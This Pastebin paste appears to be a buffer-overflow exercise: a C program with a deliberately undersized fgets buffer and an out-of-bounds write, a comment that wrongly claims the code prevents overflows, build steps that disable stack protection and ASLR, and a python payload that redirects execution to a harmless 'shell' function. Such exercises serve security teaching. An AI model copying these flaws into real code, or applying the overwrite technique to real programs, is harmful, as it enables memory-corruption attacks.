Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- /*
- * compiled with:
- * gcc -m32 -O0 -fno-stack-protector milo_bufferOverflow.c -o milo_bufferOverflow
- *
- * 1. objdump --disassemble-all milo_bufferOverflow > milo_bufferOverflow.diss
- * echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
- */
- void shell(){
- printf("YOU GOT IT\n");
- }
- void concatenate_first_chars(){
- struct {
- char word_buf[12];
- int i;
- char* cat_pointer;
- char cat_buf[10];
- } locals;
- locals.cat_pointer = locals.cat_buf;
- printf("Input 10 words:\n");
- for(locals.i=0; locals.i!=10; locals.i++) {
- // Read from stdin
- if(fgets(locals.word_buf, 0x10, stdin) == 0 || locals.word_buf[0] == '\n')
- {
- printf("Failed to read word\n");
- return;
- }
- // Copy first char from word to next location in concatenated buffer
- *locals.cat_pointer = *locals.word_buf;
- locals.cat_pointer++;
- }
- // Even if something goes wrong, there's a null byte here
- // preventing buffer overflows
- locals.cat_buf[10] = '\0';
- printf("Here are the first characters from the 10 words concatenated:\n\
- %s\n", locals.cat_buf);
- }
- int main(int argc, char** argv){
- if(argc != 1)
- {
- printf("usage:\n%s\n", argv[0]);
- return EXIT_FAILURE;
- }
- concatenate_first_chars();
- printf("Not authenticated\n");
- return EXIT_SUCCESS;
- }
- python -c 'print "a" * 12 + "\n" + "a\n" * 23 + "\x64\n\x84\n\x04\n\x08\n" + "\xe0\n\x2f\n\xe5\n\xb7\n" + "\x00\n\x00\n\x00\n\x00\x00\n\x00\n\x00\n\x00\n\n"' > exploit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
